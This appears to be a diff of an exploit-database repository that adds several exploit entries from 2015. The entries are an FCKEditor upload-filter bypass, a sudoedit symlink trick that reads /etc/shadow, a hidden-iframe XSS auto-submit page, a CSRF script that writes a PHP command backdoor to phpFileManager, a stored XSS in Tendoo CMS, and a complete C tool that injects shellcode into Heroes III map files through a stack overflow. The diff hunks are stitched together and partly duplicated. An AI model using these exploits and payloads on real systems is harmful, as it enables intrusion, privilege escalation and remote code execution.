@ -1,15 +1,25 @@
 - Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass
 - Credit goes to: Mostafa Azizi, Soroush Dalili
- Link:http://sourceforge.net/projects/fckeditor/files/FCKeditor/
+- Link: http://sourceforge.net/projects/fckeditor/files/FCKeditor/
 - Description:
 There is no validation on the extensions when FCKEditor 2.6.8 ASP version is 
 dealing with the duplicate files. As a result, it is possible to bypass 
 the protection and upload a file with any extension.
 - Reference: http://soroush.secproject.com/blog/2012/11/file-in-the-hole/
 - Solution: Please check the provided reference or the vendor website.
 - PoC: http://www.youtube.com/v/1VpxlJ5jLO8?version=3&hl=en_US&rel=0&vq=hd720
 Duplicate files do not have proper validation on their extensions.
 As a result, it is possible to upload any file with any extension on the server by using Null Character.
 Applications on IIS6 can also use "file.asp;gif" pattern.
 - Solution: In "config.asp", wherever you have: ConfigAllowedExtensions.Add "File","EXTENSION HERE" Change it to: ConfigAllowedExtensions.Add "File","^(Extensions HERE)$"
 - Vulnerability: Vulnerable File: commands.asp Function: FileUpload() Vulnerable Code: sFileName = RemoveExtension( sOriginalFileName ) & "(" & iCounter & ")." & sExtension
 - PoC:http://www.youtube.com/v/1VpxlJ5jLO8?version=3&hl=en_US&rel=0&vq=hd720
 "
 Note: Quick patch for FCKEditor 2.6.8 File Upload Bypass:
--- a/platforms/linux/local/37710.txt
+++ b/platforms/linux/local/37710.txt
@ -0,0 +1,36 @@
 # Exploit Title: sudo -e - a.k.a. sudoedit -  unauthorized privilege escalation
 # Date: 07-23-2015
 # Exploit Author: Daniel Svartman
 # Version: Sudo <=1.8.14
 # Tested on: RHEL 5/6/7 and Ubuntu (all versions)
 # CVE: CVE-2015-5602.
 Hello,
 I found a security bug in sudo (checked in the latest versions of sudo
 running on RHEL and ubuntu) when a user is granted with root access to
 modify a particular file that could be located in a subset of directories.
 It seems that sudoedit does not check the full path if a wildcard is used
 twice (e.g. /home/*/*/file.txt), allowing a malicious user to replace the
 file.txt real file with a symbolic link to a different location (e.g.
 /etc/shadow).
 I was able to perform such redirect and retrieve the data from the
 /etc/shadow file.
 In order for you to replicate this, you should configure the following line
 in your /etc/sudoers file:
 <user_to_grant_priv> ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt
 Then, logged as that user, create a subdirectory within its home folder
 (e.g. /home/<user_to_grant_priv>/newdir) and later create a symbolic link
 inside the new folder named test.txt pointing to /etc/shadow.
 When you run sudoedit /home/<user_to_grant_priv>/newdir/test.txt you will
 be allowed to access the /etc/shadow even if have not been granted with
 such access in the sudoers file.
 I checked this against fixed directories and files (not using a wildcard)
 and it does work with symbolic links created under the /home folder.
--- a/platforms/php/webapps/37457.html
+++ b/platforms/php/webapps/37457.html
@ -6,5 +6,5 @@ An attacker may leverage this issue to execute arbitrary script code in the brow
 FCKEditor 2.6.7 is vulnerable; prior versions may also be affected. 
-html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>
+<html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>
--- a/platforms/php/webapps/37712.txt
+++ b/platforms/php/webapps/37712.txt
@ -0,0 +1,125 @@
 # Exploit Title: CSRF Remote Backdoor Shell
 # Google Dork: intitle: CSRF Remote Backdoor Shell
 # Date: 2015-07-29
 # Exploit Author:  John Page ( hyp3rlinx )
 # Website: hyp3rlinx.altervista.org
 # Vendor Homepage: phpfm.sourceforge.net
 # Software Link:  phpfm.sourceforge.net
 # Version: 0.9.8
 # Tested on: windows 7 SP1
 # Category: Webapps
 Vendor:
 ================================
 phpfm.sourceforge.net
 Product:
 ============================
 phpFileManager version 0.9.8
 Vulnerability Type:
 ==========================
 CSRF Remote Backdoor Shell
 CVE Reference:
 ==============
 N/A
 Advisory Information:
 ========================================
 CSRF Remote Backdoor Shell Vulnerability
 Vulnerability Details:
 =======================================================================
 PHP File Manager is vulnerable to creation of arbitrary files on server
 via CSRF which we can use to create remote backdoor shell access if victim
 clicks our malicious linx or visits our malicious webpages.
 To create backdoor shell we will need to execute two POST requests
 1- to create PHP backdoor shell 666.php
 2- inject code and save to the backdoor we just created
 e.g.
 https://localhost/phpFileManager-0.9.8/666.php?cmd=[ OS command ]
 Exploit code(s):
 ===============
 <script>
 var
 scripto="frame=3&action=2&dir_dest=2&chmod_arg=&cmd_arg=666.php&current_dir=&selected_dir_list=&selected_file_list="
 blasphemer(scripto)
 var
 maliciouso="action=7&save_file=1&current_dir=.&filename=666.php&file_data='<?php+echo+'backdoor
 shell by hyp3rlinx......';+exec($_GET['cmd']);+?>"
 blasphemer(maliciouso)
 function blasphemer(payload){
 var xhr=new XMLHttpRequest()
 xhr.open('POST',"https://localhost/phpFileManager-0.9.8/index.php", true)
 xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded")
 xhr.send(payload)
 }
 </script>
 Disclosure Timeline:
 =========================================================
 Vendor Notification: July 28, 2015
 July 29, 2015 : Public Disclosure
 Severity Level:
 =========================================================
 High
 Description:
 ==========================================================
 Request Method(s):              [+] POST
 Vulnerable Product:             [+] phpFileManager 0.9.8
 Vulnerable Parameter(s):        [+] action, cmd_arg, file_data, chmod_arg,
 save_file
 Affected Area(s):               [+] Web Server
 ===========================================================
 [+] Disclaimer
 Permission is hereby granted for the redistribution of this advisory,
 provided that it is not altered except by reformatting it, and that due
 credit is given. Permission is explicitly given for insertion in
 vulnerability databases and similar, provided that due credit is given to
 the author.
 The author is not responsible for any misuse of the information contained
 herein and prohibits any malicious use of all security related information
 or exploits by the author or elsewhere.
 by hyp3rlinx
--- a/platforms/php/webapps/37715.txt
+++ b/platforms/php/webapps/37715.txt
@ -0,0 +1,27 @@
 # Exploit Title: Tendoo CMS Stored And Reflected Xss Vulnerability
 # Google Dork: N/A
 # Date: 28/7/2015
 # Exploit Author: Arash Khazaei
 # Vendor Homepage: http://tendoo.org/
 # Software Link: http://sourceforge.net/projects/tendoo-cms/
 # Version: 1.3
 # Tested on: Kali , Windows
 # CVE : N/A
 # Contact : 0xclay@gmail.com
 ######################
 Introduction :
 a Stored And a Reflected XSS Vulnerability In Profile Area In Tendoo CMS
 Make CMS Vulnerable And Can Be Used For Stealing Admin Cookies And ....... .
 ######################
 Stored Xss In http://localhost/tendoo/index.php/account/update In First
 Name and Last Name Inputs
 Excute Java Script Codes And If Admin Or Any Body Come In Attacker Profile
 When First Name And Last Name Loads
 JavaScripts Code Will Be Excuted
 POC :
 https://i.leetfil.es/e992ad2d.jpg
 Discovered By Arash Khazaei
--- a/platforms/win64/local/37064.py
+++ b/platforms/win64/local/37064.py
@ -6,6 +6,8 @@
 # Target OS Windows 8.0 - 8.1 x64
 # Author: Matteo Memelli ryujin <at> offensive-security.com
 # EDB Note: Swapping the shellcode for a bind or reverse shell will BSOD the machine.
 from ctypes import *
 from ctypes.wintypes import *
 import struct, sys, os, time, threading, signal
--- a/platforms/windows/local/37716.c
+++ b/platforms/windows/local/37716.c
@ -0,0 +1,272 @@
 /*
 # Exploit Title : Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution
 # Date : 2015-07-29
 # Exploit Author : John AAkerblom, Pierre Lindblad
 # Website: http://h3minternals.net
 # Vendor Homepage : 3do.com (defunct), https://sites.google.com/site/heroes3hd/
 # Version : 4.0.0.0 AND HoMM 3 HD 3.808 build 9
 # Tested on : Windows XP, Windows 8.1
 # Category: exploits
 # Description:
  This PoC embeds an exploit into an uncompressed map file (.h3m) for Heroes 
  of Might and Magic III. Once the map is started in-game, a buffer overflow 
  occuring when loading object sprite names leads to shellcode execution.
  Only basic arbitrary code execution is covered in this PoC but is possible to 
  craft an exploit that lets the game continue normally after the shellcode has
  been executed. Using extensive knowledge of the .h3m format, it is even 
  possible to create a map file that loads like normal in the game's map editor
  (which lacks the vulnerability) but stealthily executes shellcode when opened 
  in-game.
 */
 #include <string.h>
 #include <stdint.h>
 #include <stdio.h>
 #include <stdlib.h>
 /* Calc payload: https://code.google.com/p/win-exec-calc-shellcode/
   0xEBFE added at end. Note that a NULL-less payload is not actually needed
 Copyright (c) 2009-2014 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
 and Peter Ferrie <peter.ferrie@gmail.com>
 All rights reserved.
 Redistribution and use in source and binary forms, with or without
 modification, are permitted provided that the following conditions are met:
    * Redistributions of source code must retain the above copyright
      notice, this list of conditions and the following disclaimer.
    * Redistributions in binary form must reproduce the above copyright
      notice, this list of conditions and the following disclaimer in the
      documentation and/or other materials provided with the distribution.
    * Neither the name of the copyright holder nor the names of the
      contributors may be used to endorse or promote products derived from
      this software without specific prior written permission.
 THIS SOFTWARE IS PROVIDED ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
 INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
 AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
 COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
 INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
 SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */
 static const uint8_t CALC_PAYLOAD[] = {
    0x31, 0xD2, 0x52, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x52,
    0x51, 0x64, 0x8B, 0x72, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x0C,
    0xAD, 0x8B, 0x30, 0x8B, 0x7E, 0x18, 0x8B, 0x5F, 0x3C, 0x8B, 0x5C,
    0x1F, 0x78, 0x8B, 0x74, 0x1F, 0x20, 0x01, 0xFE, 0x8B, 0x54, 0x1F,
    0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x42, 0x42, 0xAD, 0x81, 0x3C, 0x07,
    0x57, 0x69, 0x6E, 0x45, 0x75, 0xF0, 0x8B, 0x74, 0x1F, 0x1C, 0x01,
    0xFE, 0x03, 0x3C, 0xAE, 0xFF, 0xD7, 0xEB, 0xFE
 };
 /*
 * The memmem() function finds the start of the first occurrence of the
 * substring 'needle' of length 'nlen' in the memory area 'haystack' of
 * length 'hlen'.
 *
 * The return value is a pointer to the beginning of the sub-string, or
 * NULL if the substring is not found.
 *
 * Original author: caf, http://stackoverflow.com/a/2188951
 */
 static uint8_t *_memmem(uint8_t *haystack, size_t hlen, uint8_t *needle, size_t nlen)
 {
    uint8_t needle_first;
    uint8_t *p = haystack;
    size_t plen = hlen;
    if (!nlen)
        return NULL;
    needle_first = *(uint8_t  *)needle;
    while (plen >= nlen && (p = memchr(p, needle_first, plen - nlen + 1)))
    {
        if (!memcmp(p, needle, nlen))
            return p;
        p++;
        plen = hlen - (p - haystack);
    }
    return NULL;
 }
 #ifdef _MSC_VER
    #pragma warning(disable:4996) // M$ fopen so unsafe
 #endif
 #pragma pack(push, 1)
 // exploit struct
 // .h3m files contain an array of object attributes - OA - in which each
 // entry starts with a string length and then a string for an object sprite.
 // This exploit overflows the stack with a malicious sprite name.
 struct exploit_oa_t
 {
    uint32_t size; // size of the rest of this struct, including shellcode
    // The rest of the struct is the sprite name for the OA, <size> bytes of 
    // which an CALL ESP-gadget address is placed so that it overwrites the
    // return address, when ESP is called shellcode2 will be executed. An 
    // additional 2 "anticrash" gadgets are needed so the game does not crash 
    // before returning to the CALL ESP-gadget.
    uint8_t nullbyte; // Must be 0x00, terminating sprite name
    uint8_t overwritten[6]; // Overwritten by game
    uint8_t shellcode1[121]; // Mostly not used, some is overwritten
    uint32_t call_esp_gadget; // Address of CALL [ESP], for saved eip on stack
    // anticrash_gadget1, needs to pass the following code down to final JMP:
    //
    // MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4]
    // XOR EBX, EBX
    // CMP EAX, EBX
    // JE SHORT <crash spot> ; JMP to crash if EAX is 0
    // MOV CL, BYTE PTR DS : [EAX - 1]
    // CMP CL, BL
    // JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
    // CMP CL, 0FF
    // JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
    // CPU Disasm
    // CMP EDI, EBX
    // JNE <good spot> ; JMP to good spot. Always occurs if we get this far
    uint32_t anticrash_gadget1;
    // anticrash_gadget2, needs to return out of the following call (tricky):
    //
    // MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2]
    // CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4]
    uint32_t anticrash_gadget2;
    // Here at 144 bytes into this struct comes the shellcode that will be 
    // executed. For the game to survive, it is wise to use this only for a 
    // short jmp as doing so means only 2 values have to be restored on the 
    // stack. Namely: original return address and format value of the h3m.
    // This PoC simply puts shellcode here, meaning the game cannot continue
    // after shellcode execution.
    uint8_t shellcode2[];
 };
 struct offsets_t
 {
    uint32_t call_esp_gadget;
    uint32_t anticrash_gadget1;
    uint32_t anticrash_gadget2;
 };
 #pragma pack(pop)
 static const struct offsets_t * const TARGET_OFFSETS[] = { 
    (struct offsets_t *)"\x87\xFF\x4E\x00\xD4\x97\x44\x00\x30\x64\x6A\x00",
    (struct offsets_t *)"\x0F\x0C\x58\x00\x48\x6A\x45\x00\x30\x68\x6A\x00"
 };
 #define TARGET_DESCS "    1: H3 Complete 4.0.0.0  [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]\n" \
                     "    2: HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]"
 #define MAX_TARGET 2
 // Name of a sprite present in all maps, this is overwritten with exploit
 #define NEEDLE "AVWmrnd0.def"
 int pack_h3m(FILE *h3m_f, const struct offsets_t * const ofs, const uint8_t *payload, long payload_size)
 {
    uint8_t *buf = NULL;
    uint8_t *p = NULL;
    long h3m_size = 0;
    long bytes = 0;
    struct exploit_oa_t *exp = NULL;
    // Read entire h3m file into memory
    fseek(h3m_f, 0, SEEK_END);
    h3m_size = ftell(h3m_f);
    rewind(h3m_f);
    buf = malloc(h3m_size);
    if (buf == NULL) {
        puts("[!] Failed to allocate memory");
        return 1;
    }
    bytes = fread(buf, sizeof(uint8_t), h3m_size, h3m_f);
    if (bytes != h3m_size) {
        free(buf);
        puts("[!] Failed to read all bytes");
        return 1;
    }
    // Find game object array in .h3m, where we will overwrite the first entry
    p = _memmem(buf, h3m_size, (uint8_t *)NEEDLE, sizeof(NEEDLE) - 1);
    if (p == NULL) {
        puts("[!] Failed to find needle \"" NEEDLE "\" in file. Make sure it is an uncompressed .h3m");
        free(buf);
        return 1;
    }
    // Move back 4 bytes from sprite name, pointing to the size of the sprite name
    p -= 4;
    // Overwrite the first game object with exploit
    exp = (struct exploit_oa_t *)p;
    exp->size = sizeof(*exp) - sizeof(exp->size) + payload_size;
    exp->nullbyte = 0;
    exp->call_esp_gadget = ofs->call_esp_gadget;
    exp->anticrash_gadget1 = ofs->anticrash_gadget1;
    exp->anticrash_gadget2 = ofs->anticrash_gadget2;
    memcpy(exp->shellcode2, payload, payload_size);
    // Write entire file from memory and cleanup
    rewind(h3m_f);
    bytes = fwrite(buf, sizeof(uint8_t), h3m_size, h3m_f);
    if (bytes != h3m_size) {
        free(buf);
        puts("[!] Failed to write all bytes");
        return 1;
    }
    free(buf);
    return 0;
 }
 static void _print_usage(void)
 {
    puts("Usage: h3mpacker <uncompressed h3m filename> <target #>");
    puts("Available targets:");
    puts(TARGET_DESCS);
    puts("Examples:");
    puts("    h3mpacker Arrogance.h3m 1");
    puts("    h3mpacker Deluge.h3m 2");
 }
 int main(int argc, char **argv)
 {
    FILE *h3m_f = NULL;
    int ret = 0;
    int target;
    if (argc != 3) {
        _print_usage();
        return 1;
    }
    h3m_f = fopen(argv[1], "rb+");
    target = strtoul(argv[2], NULL, 0);
    if (h3m_f == NULL || target < 1 || target > MAX_TARGET) {
        if (h3m_f != NULL)
            fclose(h3m_f);
        _print_usage();
        return 1;
    }
    ret = pack_h3m(h3m_f, TARGET_OFFSETS[target-1], CALC_PAYLOAD, sizeof(CALC_PAYLOAD));
    fclose(h3m_f);
    if (ret != 0)
        return ret;
    printf("[+] Payload embedded into h3m file %s\n", argv[1]);
    return 0;
 }
`@ -6,5 +6,5 @@ An attacker may leverage this issue to execute arbitrary script code in the brow`

	`FCKEditor 2.6.7 is vulnerable; prior versions may also be affected.`	`FCKEditor 2.6.7 is vulnerable; prior versions may also be affected.`

	`html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>`	`<html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>`